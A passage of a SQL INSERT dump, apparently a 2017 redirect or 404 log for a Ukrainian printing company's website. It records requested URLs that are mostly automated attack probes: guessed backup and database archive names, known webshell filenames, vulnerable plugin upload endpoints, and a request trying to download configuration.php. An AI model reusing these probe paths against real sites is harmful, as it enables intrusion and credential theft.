00:00:00',301),(11484,'http://ekvatorprint.com.ua/database/ekvatorprint.com.ua-db.tar.gz',NULL,'','',1,0,'2017-08-16 17:22:34','0000-00-00 00:00:00',301),(11485,'http://ekvatorprint.com.ua/database/ekvatorprint.com.ua_database.tar.gz',NULL,'','',1,0,'2017-08-16 17:22:34','0000-00-00 00:00:00',301),(11486,'http://ekvatorprint.com.ua/database/ekvatorprint.com.ua-database.tar.gz',NULL,'','',1,0,'2017-08-16 17:22:35','0000-00-00 00:00:00',301),(11487,'http://ekvatorprint.com.ua/database/db.tar',NULL,'','',1,0,'2017-08-16 17:22:35','0000-00-00 00:00:00',301),(11488,'http://ekvatorprint.com.ua/database/dbdump.tar',NULL,'','',1,0,'2017-08-16 17:22:35','0000-00-00 00:00:00',301),(11489,'http://ekvatorprint.com.ua/database/database.tar',NULL,'','',1,0,'2017-08-16 17:22:35','0000-00-00 00:00:00',301),(11490,'http://ekvatorprint.com.ua/database/localhostdb.tar',NULL,'','',1,0,'2017-08-16 17:22:35','0000-00-00 00:00:00',301),(11491,'http://ekvatorprint.com.ua/database/localhost_db.tar',NULL,'','',1,0,'2017-08-16 17:22:36','0000-00-00 00:00:00',301),(11492,'http://ekvatorprint.com.ua/database/localhost-db.tar',NULL,'','',1,0,'2017-08-16 17:22:36','0000-00-00 00:00:00',301),(11493,'http://ekvatorprint.com.ua/database/localhost_database.tar',NULL,'','',1,0,'2017-08-16 17:22:36','0000-00-00 00:00:00',301),(11494,'http://ekvatorprint.com.ua/database/localhost-database.tar',NULL,'','',1,0,'2017-08-16 17:22:36','0000-00-00 00:00:00',301),(11495,'http://ekvatorprint.com.ua/database/ekvatorprint.com.uadb.tar',NULL,'','',1,0,'2017-08-16 17:22:36','0000-00-00 00:00:00',301),(11496,'http://ekvatorprint.com.ua/database/ekvatorprint.com.ua_db.tar',NULL,'','',1,0,'2017-08-16 17:22:36','0000-00-00 00:00:00',301),(11497,'http://ekvatorprint.com.ua/database/ekvatorprint.com.ua-db.tar',NULL,'','',1,0,'2017-08-16 17:22:36','0000-00-00 00:00:00',301),(11498,'http://ekvatorprint.com.ua/database/ekvatorprint.com.ua_database.tar',NULL,'','',1,0,'2017-08-16 17:22:37','0000-00-00 00:00:00',301),(11499,'http://ekvatorprint.com.ua/database/ekvatorprint.com.ua-database.tar',NULL,'','',1,0,'2017-08-16 17:22:37','0000-00-00 00:00:00',301),(11500,'http://ekvatorprint.com.ua/database/ekvatorprintdb.tar',NULL,'','',1,0,'2017-08-16 17:22:37','0000-00-00 00:00:00',301),(11501,'http://ekvatorprint.com.ua/database/ekvatorprint_db.tar',NULL,'','',1,0,'2017-08-16 17:22:37','0000-00-00 00:00:00',301),(11502,'http://ekvatorprint.com.ua/database/ekvatorprint-db.tar',NULL,'','',1,0,'2017-08-16 17:22:38','0000-00-00 00:00:00',301),(11503,'http://ekvatorprint.com.ua/database/ekvatorprint_database.tar',NULL,'','',1,0,'2017-08-16 17:22:38','0000-00-00 00:00:00',301),(11504,'http://ekvatorprint.com.ua/database/ekvatorprint-database.tar',NULL,'','',1,0,'2017-08-16 17:22:38','0000-00-00 00:00:00',301),(11505,'http://ekvatorprint.com.ua/database/db.7z',NULL,'','',1,0,'2017-08-16 17:22:38','0000-00-00 00:00:00',301),(11506,'http://ekvatorprint.com.ua/database/dbdump.7z',NULL,'','',1,0,'2017-08-16 17:22:38','0000-00-00 00:00:00',301),(11507,'http://ekvatorprint.com.ua/database/database.7z',NULL,'','',1,0,'2017-08-16 17:22:38','0000-00-00 00:00:00',301),(11508,'http://ekvatorprint.com.ua/database/localhostdb.7z',NULL,'','',1,0,'2017-08-16 17:22:39','0000-00-00 00:00:00',301),(11509,'http://ekvatorprint.com.ua/database/localhost_db.7z',NULL,'','',1,0,'2017-08-16 17:22:39','0000-00-00 00:00:00',301),(11510,'http://ekvatorprint.com.ua/database/localhost-db.7z',NULL,'','',1,0,'2017-08-16 17:22:39','0000-00-00 00:00:00',301),(11511,'http://ekvatorprint.com.ua/database/localhost_database.7z',NULL,'','',1,0,'2017-08-16 17:22:39','0000-00-00 00:00:00',301),(11512,'http://ekvatorprint.com.ua/database/localhost-database.7z',NULL,'','',1,0,'2017-08-16 17:22:40','0000-00-00 00:00:00',301),(11513,'http://ekvatorprint.com.ua/database/ekvatorprintdb.7z',NULL,'','',1,0,'2017-08-16 17:22:40','0000-00-00 00:00:00',301),(11514,'http://ekvatorprint.com.ua/database/ekvatorprint_db.7z',NULL,'','',1,0,'2017-08-16 17:22:40','0000-00-00 00:00:00',301),(11515,'http://ekvatorprint.com.ua/database/ekvatorprint-db.7z',NULL,'','',1,0,'2017-08-16 17:22:40','0000-00-00 00:00:00',301),(11516,'http://ekvatorprint.com.ua/database/ekvatorprint_database.7z',NULL,'','',1,0,'2017-08-16 17:22:40','0000-00-00 00:00:00',301),(11517,'http://ekvatorprint.com.ua/database/ekvatorprint-database.7z',NULL,'','',1,0,'2017-08-16 17:22:40','0000-00-00 00:00:00',301),(11518,'http://ekvatorprint.com.ua/database/ekvatorprint.com.uadb.7z',NULL,'','',1,0,'2017-08-16 17:22:41','0000-00-00 00:00:00',301),(11519,'http://ekvatorprint.com.ua/database/ekvatorprint.com.ua_db.7z',NULL,'','',1,0,'2017-08-16 17:22:41','0000-00-00 00:00:00',301),(11520,'http://ekvatorprint.com.ua/database/ekvatorprint.com.ua-db.7z',NULL,'','',1,0,'2017-08-16 17:22:41','0000-00-00 00:00:00',301),(11521,'http://ekvatorprint.com.ua/database/ekvatorprint.com.ua_database.7z',NULL,'','',1,0,'2017-08-16 17:22:42','0000-00-00 00:00:00',301),(11522,'http://ekvatorprint.com.ua/database/ekvatorprint.com.ua-database.7z',NULL,'','',1,0,'2017-08-16 17:22:42','0000-00-00 00:00:00',301),(11523,'http://ekvatorprint.com.ua/database/dbdump.rar',NULL,'','',1,0,'2017-08-16 17:22:42','0000-00-00 00:00:00',301),(11524,'http://ekvatorprint.com.ua/database/database.rar',NULL,'','',1,0,'2017-08-16 17:22:43','0000-00-00 00:00:00',301),(11525,'http://ekvatorprint.com.ua/database/localhostdb.rar',NULL,'','',1,0,'2017-08-16 17:22:43','0000-00-00 00:00:00',301),(11526,'http://ekvatorprint.com.ua/database/localhost_db.rar',NULL,'','',1,0,'2017-08-16 17:22:43','0000-00-00 00:00:00',301),(11527,'http://ekvatorprint.com.ua/database/localhost-db.rar',NULL,'','',1,0,'2017-08-16 17:22:44','0000-00-00 00:00:00',301),(11528,'http://ekvatorprint.com.ua/database/localhost_database.rar',NULL,'','',1,0,'2017-08-16 17:22:44','0000-00-00 00:00:00',301),(11529,'http://ekvatorprint.com.ua/database/localhost-database.rar',NULL,'','',1,0,'2017-08-16 17:22:45','0000-00-00 00:00:00',301),(11530,'http://ekvatorprint.com.ua/database/ekvatorprint.com.uadb.rar',NULL,'','',1,0,'2017-08-16 17:22:45','0000-00-00 00:00:00',301),(11531,'http://ekvatorprint.com.ua/database/ekvatorprint.com.ua_db.rar',NULL,'','',1,0,'2017-08-16 17:22:45','0000-00-00 00:00:00',301),(11532,'http://ekvatorprint.com.ua/database/ekvatorprint.com.ua-db.rar',NULL,'','',1,0,'2017-08-16 17:22:45','0000-00-00 00:00:00',301),(11533,'http://ekvatorprint.com.ua/database/ekvatorprint.com.ua_database.rar',NULL,'','',1,0,'2017-08-16 17:22:46','0000-00-00 00:00:00',301),(11534,'http://ekvatorprint.com.ua/database/ekvatorprint.com.ua-database.rar',NULL,'','',1,0,'2017-08-16 17:22:47','0000-00-00 00:00:00',301),(11535,'http://ekvatorprint.com.ua/database/ekvatorprintdb.rar',NULL,'','',1,0,'2017-08-16 17:22:47','0000-00-00 00:00:00',301),(11536,'http://ekvatorprint.com.ua/database/ekvatorprint_db.rar',NULL,'','',1,0,'2017-08-16 17:22:48','0000-00-00 00:00:00',301),(11537,'http://ekvatorprint.com.ua/database/ekvatorprint-db.rar',NULL,'','',1,0,'2017-08-16 17:22:48','0000-00-00 00:00:00',301),(11538,'http://ekvatorprint.com.ua/database/ekvatorprint_database.rar',NULL,'','',1,0,'2017-08-16 17:22:48','0000-00-00 00:00:00',301),(11539,'http://ekvatorprint.com.ua/database/ekvatorprint-database.rar',NULL,'','',1,0,'2017-08-16 17:22:48','0000-00-00 00:00:00',301),(11540,'http://ekvatorprint.com.ua/latest.backup.tar',NULL,'','',1,0,'2017-08-16 17:22:48','0000-00-00 00:00:00',301),(11541,'http://ekvatorprint.com.ua/backup/latest.backup.tar',NULL,'','',1,0,'2017-08-16 17:22:48','0000-00-00 00:00:00',301),(11542,'http://ekvatorprint.com.ua/latest.backup.zip',NULL,'','',1,0,'2017-08-16 17:22:49','0000-00-00 00:00:00',301),(11543,'http://ekvatorprint.com.ua/backup/latest.backup.zip',NULL,'','',1,0,'2017-08-16 17:22:49','0000-00-00 00:00:00',301),(11544,'http://ekvatorprint.com.ua/latest.backup.tar.gz',NULL,'','',1,0,'2017-08-16 17:22:50','0000-00-00 00:00:00',301),(11545,'http://ekvatorprint.com.ua/backup/latest.backup.tar.gz',NULL,'','',1,0,'2017-08-16 17:22:50','0000-00-00 00:00:00',301),(11546,'http://ekvatorprint.com.ua/latest.backup.rar',NULL,'','',1,0,'2017-08-16 17:22:50','0000-00-00 00:00:00',301),(11547,'http://ekvatorprint.com.ua/backup/latest.backup.rar',NULL,'','',1,0,'2017-08-16 17:22:50','0000-00-00 00:00:00',301),(11548,'http://ekvatorprint.com.ua/latest.backup.7z',NULL,'','',1,0,'2017-08-16 17:22:51','0000-00-00 00:00:00',301),(11549,'http://ekvatorprint.com.ua/backup/latest.backup.7z',NULL,'','',1,0,'2017-08-16 17:22:51','0000-00-00 00:00:00',301),(11550,'http://ekvatorprint.com.ua/content-footer.php',NULL,'ekvatorprint.com.ua','',1,0,'2017-08-17 04:23:46','0000-00-00 00:00:00',301),(11551,'http://ekvatorprint.com.ua/mm5/admin.mvc',NULL,'ekvatorprint.com.ua','',1,0,'2017-08-18 03:29:45','0000-00-00 00:00:00',301),(11552,'http://ekvatorprint.com.ua/wologin.php?check=true',NULL,'ekvatorprint.com.ua','',1,0,'2017-08-18 11:51:51','0000-00-00 00:00:00',301),(11553,'http://ekvatorprint.com.ua/wpversion.php?check=true',NULL,'ekvatorprint.com.ua','',1,0,'2017-08-18 11:54:32','0000-00-00 00:00:00',301),(11554,'http://ekvatorprint.com.ua/sell.php?check=true',NULL,'ekvatorprint.com.ua','',1,0,'2017-08-18 11:55:07','0000-00-00 00:00:00',301),(11555,'http://ekvatorprint.com.ua/libraries/joomla/base/content-footer.php',NULL,'ekvatorprint.com.ua','',1,0,'2017-08-18 15:17:50','0000-00-00 00:00:00',301),(11556,'http://ekvatorprint.com.ua/home/wp-admin/setup-config.php',NULL,'','',2,0,'2017-08-21 06:03:22','0000-00-00 00:00:00',301),(11557,'http://ekvatorprint.com.ua/wordpress/beta/wp-admin/setup-config.php',NULL,'','',1,0,'2017-08-21 06:03:22','0000-00-00 00:00:00',301),(11558,'http://ekvatorprint.com.ua/wp/beta/wp-admin/setup-config.php',NULL,'','',1,0,'2017-08-21 06:03:23','0000-00-00 00:00:00',301),(11559,'http://ekvatorprint.com.ua/blog/beta/wp-admin/setup-config.php',NULL,'','',1,0,'2017-08-21 06:03:23','0000-00-00 00:00:00',301),(11560,'http://ekvatorprint.com.ua/wp-content/themes/headway-166/style.css',NULL,'http://ekvatorprint.com.ua/wp-content/themes/headway-166/style.css','',2,0,'2017-08-21 13:43:11','0000-00-00 00:00:00',301),(11561,'http://ekvatorprint.com.ua/banner-printing',NULL,'','',1,0,'2017-08-21 16:21:30','0000-00-00 00:00:00',301),(11562,'http://ekvatorprint.com.ua/banner-printingМоб',NULL,'','',2,0,'2017-08-21 16:21:31','0000-00-00 00:00:00',301),(11563,'http://ekvatorprint.com.ua/banner-printingРњРѕР±',NULL,'','',1,0,'2017-08-21 16:21:31','0000-00-00 00:00:00',301),(11564,'http://ekvatorprint.com.ua/images/inages.php',NULL,'ekvatorprint.com.ua','',1,0,'2017-08-22 13:02:26','0000-00-00 00:00:00',301),(11565,'http://ekvatorprint.com.ua/images/copy_conflg.php?passw0rd=123',NULL,'ekvatorprint.com.ua','',1,0,'2017-08-22 13:21:50','0000-00-00 00:00:00',301),(11566,'http://ekvatorprint.com.ua/libraries/joomla/base/options-permalinks.php',NULL,'ekvatorprint.com.ua','',1,0,'2017-08-22 13:30:33','0000-00-00 00:00:00',301),(11567,'http://ekvatorprint.com.ua/assets/images/search.php',NULL,'ekvatorprint.com.ua','',6,0,'2017-08-22 14:28:22','0000-00-00 00:00:00',301),(11568,'http://ekvatorprint.com.ua/cache/search.php',NULL,'ekvatorprint.com.ua','',2,0,'2017-08-22 14:30:32','0000-00-00 00:00:00',301),(11569,'http://ekvatorprint.com.ua/components/com_content/models/green.php',NULL,'ekvatorprint.com.ua','',1,0,'2017-08-22 15:01:46','0000-00-00 00:00:00',301),(11570,'http://ekvatorprint.com.ua/administrator/components/com_xcloner-backupandrestore/index2.php',NULL,'','',14,0,'2017-08-22 16:36:22','0000-00-00 00:00:00',301),(11571,'http://ekvatorprint.com.ua/libraries/joomla/base/extruder.php',NULL,'ekvatorprint.com.ua','',1,0,'2017-08-23 17:18:12','0000-00-00 00:00:00',301),(11572,'http://ekvatorprint.com.ua/interst.php?action=test',NULL,'ekvatorprint.com.ua','',2,0,'2017-08-23 17:26:10','0000-00-00 00:00:00',301),(11573,'http://ekvatorprint.com.ua/plugins/content/apismtp/apismtp.php',NULL,'','',7,0,'2017-08-23 21:42:08','0000-00-00 00:00:00',301),(11574,'http://ekvatorprint.com.ua/wp-post.php',NULL,'ekvatorprint.com.ua','',5,0,'2017-08-24 08:25:03','0000-00-00 00:00:00',301),(11575,'http://ekvatorprint.com.ua/modules/mod_jmodule/mod_jmodule.php',NULL,'ekvatorprint.com.ua','',8,0,'2017-08-24 13:17:40','0000-00-00 00:00:00',301),(11576,'http://ekvatorprint.com.ua/plugins/content/apismtp.php',NULL,'','',7,0,'2017-08-24 16:02:05','0000-00-00 00:00:00',301),(11577,'http://ekvatorprint.com.ua/libraries/joomla/base/content-post.php',NULL,'http://ekvatorprint.com.ua/libraries/joomla/base/content-post.php','',4,0,'2017-08-24 19:24:15','0000-00-00 00:00:00',301),(11578,'http://ekvatorprint.com.ua/new/administrator/index.php',NULL,'','',1,0,'2017-08-25 15:32:36','0000-00-00 00:00:00',301),(11579,'http://ekvatorprint.com.ua/web/administrator/index.php',NULL,'','',1,0,'2017-08-25 18:24:05','0000-00-00 00:00:00',301),(11580,'http://ekvatorprint.com.ua/components/com_chronoforms/views/data.php',NULL,'','',1,0,'2017-08-28 06:21:53','0000-00-00 00:00:00',301),(11581,'http://ekvatorprint.com.ua/wp-includes/js/jquery/jquery.js',NULL,'','',16,0,'2017-08-28 15:27:10','0000-00-00 00:00:00',301),(11582,'http://ekvatorprint.com.ua/modules/mod_swmenufree/logo_img.php',NULL,'http://ekvatorprint.com.ua/modules/mod_swmenufree/logo_img.php','',1,0,'2017-08-28 18:28:36','0000-00-00 00:00:00',301),(11583,'http://ekvatorprint.com.ua/wp-includes/js/jquery/suggest.js',NULL,'','',1,0,'2017-08-29 04:36:59','0000-00-00 00:00:00',301),(11584,'http://ekvatorprint.com.ua/assets/images/accesson.php',NULL,'ekvatorprint.com.ua','',3,0,'2017-08-29 07:36:32','0000-00-00 00:00:00',301),(11585,'http://ekvatorprint.com.ua/administrator/components/com_contenthistory/index.html',NULL,'http://ekvatorprint.com.ua/administrator/components/com_contenthistory/index.html','',1,0,'2017-08-29 14:10:01','0000-00-00 00:00:00',301),(11586,'http://ekvatorprint.com.ua/custom-post.php',NULL,'ekvatorprint.com.ua','',1,0,'2017-08-29 20:59:46','0000-00-00 00:00:00',301),(11587,'http://ekvatorprint.com.ua/wp-custom.php',NULL,'ekvatorprint.com.ua','',1,0,'2017-08-29 21:01:30','0000-00-00 00:00:00',301),(11588,'http://ekvatorprint.com.ua/components/com_foxcontact/lib/file-uploader.php',NULL,'ekvatorprint.com.ua','',11,0,'2017-08-30 16:07:33','0000-00-00 00:00:00',301),(11589,'http://ekvatorprint.com.ua/images/stories/readme.php',NULL,'http://ekvatorprint.com.ua/images/stories/readme.php','',1,0,'2017-08-30 21:57:24','0000-00-00 00:00:00',301),(11590,'http://ekvatorprint.com.ua/administrator/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php',NULL,'http://ekvatorprint.com.ua/administrator/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php','',11,0,'2017-08-31 18:54:02','0000-00-00 00:00:00',301),(11591,'http://ekvatorprint.com.ua/index.php?option=com_joomanager&controller=details&task=download&path=configuration.php',NULL,'ekvatorprint.com.ua','',5,0,'2017-09-01 07:50:16','0000-00-00 00:00:00',301),(11592,'http://ekvatorprint.com.ua/wp-content/themes/headway-162/style.css',NULL,'http://ekvatorprint.com.ua/wp-content/themes/headway-162/style.css','',4,0,'2017-09-02 16:53:31','0000-00-00 00:00:00',301),(11593,'http://ekvatorprint.com.ua/robots.php?blog_id=1',NULL,'ekvatorprint.com.ua','',1,0,'2017-09-05 13:52:30','0000-00-00 00:00:00',301),(11594,'http://ekvatorprint.com.ua/printing-on-vinyl/trackback/',NULL,'http://ekvatorprint.com.ua/printing-on-vinyl','',2,0,'2017-09-05 15:49:09','0000-00-00 00:00:00',301),(11595,'http://ekvatorprint.com.ua/includes/u2p.php',NULL,'http://ekvatorprint.com.ua/includes/u2p.php','',1,0,'2017-09-07 20:04:11','0000-00-00 00:00:00',301),(11596,'http://ekvatorprint.com.ua/libraries/respectMuslims.php',NULL,'http://ekvatorprint.com.ua/libraries/respectMuslims.php','',1,0,'2017-09-08 18:59:15','0000-00-00 00:00:00',301),(11597,'http://ekvatorprint.com.ua/wp-content/plugins/easyrotator-for-wordpress/bb.php',NULL,'','',1,0,'2017-09-10 13:54:54','0000-00-00 00:00:00',301),(11598,'http://ekvatorprint.com.ua/wp-content/plugins/easyrotator-for-wordpress/b.php',NULL,'','',1,0,'2017-09-10 18:33:13','0000-00-00 00:00:00',301),(11599,'http://ekvatorprint.com.ua/plugins/content/easyfolderlistingpro/eflp_files/readme.txt',NULL,'ekvatorprint.com.ua','',1,0,'2017-09-11 16:50:11','0000-00-00 00:00:00',301),(11600,'http://ekvatorprint.com.ua/g;m.parentNode.insertBefore',NULL,'','',1,0,'2017-09-11 19:02:01','0000-00-00 00:00:00',301),(11601,'http://ekvatorprint.com.ua/googleads.g.doubleclick.net/pagead/viewthroughconversion/936639802/?guid=ON&script=0',NULL,'','',1,0,'2017-09-11 19:02:02','0000-00-00 00:00:00',301),(11602,'http://ekvatorprint.com.ua/wp-pols.php',NULL,'','',6,0,'2017-09-12 03:12:57','0000-00-00 00:00:00',301),(11603,'http://ekvatorprint.com.ua/ldp.php',NULL,'ekvatorprint.com.ua','',1,0,'2017-09-12 10:35:28','0000-00-00 00:00:00',301),(11604,'http://ekvatorprint.com.ua/wp-profi1e.php?x=1',NULL,'','',8,0,'2017-09-12 11:14:57','0000-00-00 00:00:00',301),(11605,'http://ekvatorprint.com.ua/xmlrpc-blog.php',NULL,'','',7,0,'2017-09-12 18:36:49','0000-00-00 00:00:00',301),(11606,'http://ekvatorprint.com.ua/indes.php',NULL,'','',5,0,'2017-09-12 23:46:10','0000-00-00 00:00:00',301),(11607,'http://ekvatorprint.com.ua/netcat/admin/',NULL,'http://ekvatorprint.com.ua/netcat/admin/','',2,0,'2017-09-13 16:28:16','0000-00-00 00:00:00',301),(11608,'http://ekvatorprint.com.ua/plugins/system/cache/system.php',NULL,'ekvatorprint.com.ua','',1,0,'2017-09-18 20:06:32','0000-00-00 00:00:00',301),(11609,'http://ekvatorprint.com.ua/modules/mod_menu/confirm.php',NULL,'ekvatorprint.com.ua','',1,0,'2017-09-20 13:00:09','0000-00-00 00:00:00',301),(11610,'http://ekvatorprint.com.ua/components/com_banners/banners.html.php',NULL,'ekvatorprint.com.ua','',1,0,'2017-09-20 13:36:12','0000-00-00 00:00:00',301),(11611,'http://ekvatorprint.com.ua/tmp/tmpl.php',NULL,'ekvatorprint.com.ua','',1,0,'2017-09-20 13:36:29','0000-00-00 00:00:00',301),(11612,'http://ekvatorprint.com.ua/libraries/joomla/access/log.php',NULL,'ekvatorprint.com.ua','',1,0,'2017-09-20 15:49:10','0000-00-00 00:00:00',301),(11613,'http://ekvatorprint.com.ua/cache/accesson.php',NULL,'ekvatorprint.com.ua','',1,0,'2017-09-21 13:18:19','0000-00-00 00:00:00',301),(11614,'http://ekvatorprint.com.ua/76d48fe102e5ac480296e37b512a0f65',NULL,'https://a.pr-cy.ru/ekvatorprint.com.ua','',1,0,'2017-09-21 15:50:14','0000-00-00 00:00:00',301),(11615,'http://ekvatorprint.com.ua/squid-internal-static/icons/SN.png',NULL,'http://ekvatorprint.com.ua/banner-printing','',14,0,'2017-09-23 16:33:04','0000-00-00 00:00:00',301),(11616,'http://ekvatorprint.com.ua/script.php',NULL,'ekvatorprint.com.ua','',3,0,'2017-09-25 10:33:05','0000-00-00 00:00:00',301),(11617,'http://ekvatorprint.com.ua/components/com_foxcontact/foxcontact.php',NULL,'','',18,0,'2017-09-25 18:19:15','0000-00-00 00:00:00',301),(11618,'http://ekvatorprint.com.ua/printing-on-canvas@20',NULL,'http://ekvatorprint.com.ua/printing-on-canvas%4020','',33,0,'2017-09-26 18:51:46','0000-00-00 00:00:00',301),(11619,'http://ekvatorprint.com.ua/wp-content/themes/organizer/lib_upload/server/php/',NULL,'http://ekvatorprint.com.ua/wp-content/themes/organizer/lib_upload/server/php/','',1,0,'2017-09-27 01:08:15','0000-00-00 00:00:00',301),(11620,'http://ekvatorprint.com.ua/deliveryasdas',NULL,'','',1,0,'2017-09-27 09:32:25','0000-00-00 00:00:00',301),(11621,'http://ekvatorprint.com.ua/components/com_easybookreloaded/css/easybookreloaded.css',NULL,'','',1,0,'2017-09-28 01:17:51','0000-00-00 00:00:00',301),(11622,'http://ekvatorprint.com.ua/components/com_vitabook/assets/vitabookLegacy.css',NULL,'','',1,0,'2017-09-28 01:17:53','0000-00-00 00:00:00',301),(11623,'http://ekvatorprint.com.ua/components/com_phocaguestbook/assets/phocaguestbook.css',NULL,'','',1,0,'2017-10-02 03:09:38','0000-00-00 00:00:00',301),(11624,'http://ekvatorprint.com.ua/mcafee_shield.png',NULL,'http://ekvatorprint.com.ua/printing-on-vinyl','',8,0,'2017-10-04 11:58:48','0000-00-00 00:00:00',301),(11625,'http://ekvatorprint.com.ua/xup_light.png',NULL,'http://ekvatorprint.com.ua/printing-on-vinyl','',7,0,'2017-10-04 11:58:49','0000-00-00 00:00:00',301),(11626,'http://ekvatorprint.com.ua/wordpress',NULL,'','',2,0,'2017-10-05 07:02:21','0000-00-00 00:00:00',301),(11627,'http://ekvatorprint.com.ua/nomoneyinc/css/mstyles.css',NULL,'http://ekvatorprint.com.ua/','',1,0,'2017-10-05 07:18:05','0000-00-00 00:00:00',301),(11628,'http://ekvatorprint.com.ua/wp-content/plugins/BirdsRio.php',NULL,'ekvatorprint.com.ua','',1,0,'2017-10-07 09:49:16','0000-00-00 00:00:00',301),(11629,'http://ekvatorprint.com.ua/wp_honor.php',NULL,'ekvatorprint.com.ua','',3,0,'2017-10-07 09:51:35','0000-00-00 00:00:00',301),(11630,'http://ekvatorprint.com.ua/Iontrol.php',NULL,'ekvatorprint.com.ua','',3,0,'2017-10-07 09:58:23','0000-00-00 00:00:00',301),(11631,'http://ekvatorprint.com.ua/wp-content/plugins/all-in-one-seo/aioseop_class.php?login=fg5mb',NULL,'ekvatorprint.com.ua','',1,0,'2017-10-07 09:59:27','0000-00-00 00:00:00',301),(11632,'http://ekvatorprint.com.ua/wp-content/plugins/SocketIontrol.php',NULL,'ekvatorprint.com.ua','',1,0,'2017-10-07 10:01:17','0000-00-00 00:00:00',301),(11633,'http://ekvatorprint.com.ua/wp-content/plugins/BirdsRios.php',NULL,'ekvatorprint.com.ua','',1,0,'2017-10-07 10:02:59','0000-00-00 00:00:00',301),(11634,'http://ekvatorprint.com.ua/wp-includes/class-comments.php',NULL,'ekvatorprint.com.ua','',1,0,'2017-10-07 10:12:28','0000-00-00 00:00:00',301),(11635,'http://ekvatorprint.com.ua/wp-content/plugins/SocketIasrgasfontrol.php',NULL,'ekvatorprint.com.ua','',1,0,'2017-10-07 10:14:32','0000-00-00 00:00:00',301),(11636,'http://ekvatorprint.com.ua/wp-includes/theme-compat/files.php',NULL,'ekvatorprint.com.ua','',1,0,'2017-10-07 10:15:20','0000-00-00 00:00:00',301),(11637,'http://ekvatorprint.com.ua/wp-admin/network/update.php?login=x2a5xB',NULL,'ekvatorprint.com.ua','',1,0,'2017-10-07 10:17:34','0000-00-00 00:00:00',301),(11638,'http://ekvatorprint.com.ua/wp-content/plugins/thumbnail.php',NULL,'ekvatorprint.com.ua','',1,0,'2017-10-07 10:18:30','0000-00-00 00:00:00',301),(11639,'http://ekvatorprint.com.ua/wp-content/plugins/Wp-LayerSlider/layerslider.php?login=qlaoxk',NULL,'ekvatorprint.com.ua','',1,0,'2017-10-07 10:20:02','0000-00-00 00:00:00',301),(11640,'http://ekvatorprint.com.ua/utraff.com/index.php?r=iframe/index&id=33',NULL,'http://ekvatorprint.com.ua/printing-on-canvas','',17,0,'2017-10-07 12:38:56','0000-00-00 00:00:00',301),(11641,'http://ekvatorprint.com.ua/parseopml/popup-pomo.php',NULL,'http://ekvatorprint.com.ua/parseopml/popup-pomo.php','',10,0,'2017-10-08 15:20:24','0000-00-00 00:00:00',301),(11642,'http://ekvatorprint.com.ua/sandy/popup-pomo.php',NULL,'http://ekvatorprint.com.ua/sandy/popup-pomo.php','',2,0,'2017-10-08 15:33:57','0000-00-00 00:00:00',301),(11643,'http://ekvatorprint.com.ua/feeder/popup-pomo.php',NULL,'http://ekvatorprint.com.ua/feeder/popup-pomo.php','',11,0,'2017-10-08 16:20:35','0000-00-00 00:00:00',301),(11644,'http://ekvatorprint.com.ua/manager/popup-pomo.php',NULL,'http://ekvatorprint.com.ua/manager/popup-pomo.php','',9,0,'2017-10-08 18:41:57','0000-00-00 00:00:00',301),(11645,'http://ekvatorprint.com.ua/pressthis/popup-pomo.php',NULL,'http://ekvatorprint.com.ua/pressthis/popup-pomo.php','',13,0,'2017-10-08 18:54:51','0000-00-00 00:00:00',301),(11646,'http://ekvatorprint.com.ua/networka/popup-pomo.php',NULL,'http://ekvatorprint.com.ua/networka/popup-pomo.php','',8,0,'2017-10-08 19:25:23','0000-00-00 00:00:00',301),(11647,'http://ekvatorprint.com.ua/scripts/popup-pomo.php',NULL,'http://ekvatorprint.com.ua/scripts/popup-pomo.php','',10,0,'2017-10-08 19:28:31','0000-00-00 00:00:00',301),(11648,'http://ekvatorprint.com.ua/ogone/popup-pomo.php',NULL,'http://ekvatorprint.com.ua/ogone/popup-pomo.php','',4,0,'2017-10-08 20:22:09','0000-00-00 00:00:00',301),(11649,'http://ekvatorprint.com.ua/discussion/popup-pomo.php',NULL,'http://ekvatorprint.com.ua/discussion/popup-pomo.php','',15,0,'2017-10-08 21:36:01','0000-00-00 00:00:00',301),(11650,'http://ekvatorprint.com.ua/revision/popup-pomo.php',NULL,'http://ekvatorprint.com.ua/revision/popup-pomo.php','',6,0,'2017-10-08 22:41:44','0000-00-00 00:00:00',301),(11651,'http://ekvatorprint.com.ua/permalink/popup-pomo.php',NULL,'http://ekvatorprint.com.ua/permalink/popup-pomo.php','',12,0,'2017-10-08 23:47:37','0000-00-00 00:00:00',301),(11652,'http://ekvatorprint.com.ua/paypal/popup-pomo.php',NULL,'http://ekvatorprint.com.ua/paypal/popup-pomo.php','',6,0,'2017-10-09 01:00:05','0000-00-00 00:00:00',301),(11653,'http://ekvatorprint.com.ua/logs/sun.php',NULL,'http://ekvatorprint.com.ua/logs/sun.php','',5,0,'2017-10-09 14:39:08','0000-00-00 00:00:00',301),(11654,'http://ekvatorprint.com.ua/mrswenvsr.php',NULL,'http://ekvatorprint.com.ua/mrswenvsr.php','',3,0,'2017-10-09 16:32:37','0000-00-00 00:00:00',301),(11655,'http://ekvatorprint.com.ua/libraries/phputf8/sun.php',NULL,'http://ekvatorprint.com.ua/libraries/phputf8/sun.php','',1,0,'2017-10-09 16:39:42','0000-00-00 00:00:00',301),(11656,'http://ekvatorprint.com.ua/setupconfig/popup-pomo.php',NULL,'http://ekvatorprint.com.ua/setupconfig/popup-pomo.php','',11,0,'2017-10-10 11:03:47','0000-00-00 00:00:00',301),(11657,'http://ekvatorprint.com.ua/libraries/joomla/template/mark.php',NULL,'http://ekvatorprint.com.ua/libraries/joomla/template/mark.php','',10,0,'2017-10-10 11:28:14','0000-00-00 00:00:00',301),(11658,'http://ekvatorprint.com.ua/installa/popup-pomo.php',NULL,'http://ekvatorprint.com.ua/installa/popup-pomo.php','',7,0,'2017-10-10 11:45:54','0000-00-00 00:00:00',301),(11659,'http://ekvatorprint.com.ua/term/popup-pomo.php',NULL,'http://ekvatorprint.com.ua/term/popup-pomo.php','',6,0,'2017-10-10 14:06:24','0000-00-00 00:00:00',301),(11660,'http://ekvatorprint.com.ua/layouts/joomla/edit/info.php',NULL,'http://ekvatorprint.com.ua/layouts/joomla/edit/info.php','',6,0,'2017-10-10 17:08:21','0000-00-00 00:00:00',301),(11661,'http://ekvatorprint.com.ua/widgets/popup-pomo.php',NULL,'http://ekvatorprint.com.ua/widgets/popup-pomo.php','',10,0,'2017-10-10 18:01:47','0000-00-00 00:00:00',301),(11662,'http://ekvatorprint.com.ua/entful/popup-pomo.php',NULL,'http://ekvatorprint.com.ua/entful/popup-pomo.php','',3,0,'2017-10-10 18:23:25','0000-00-00 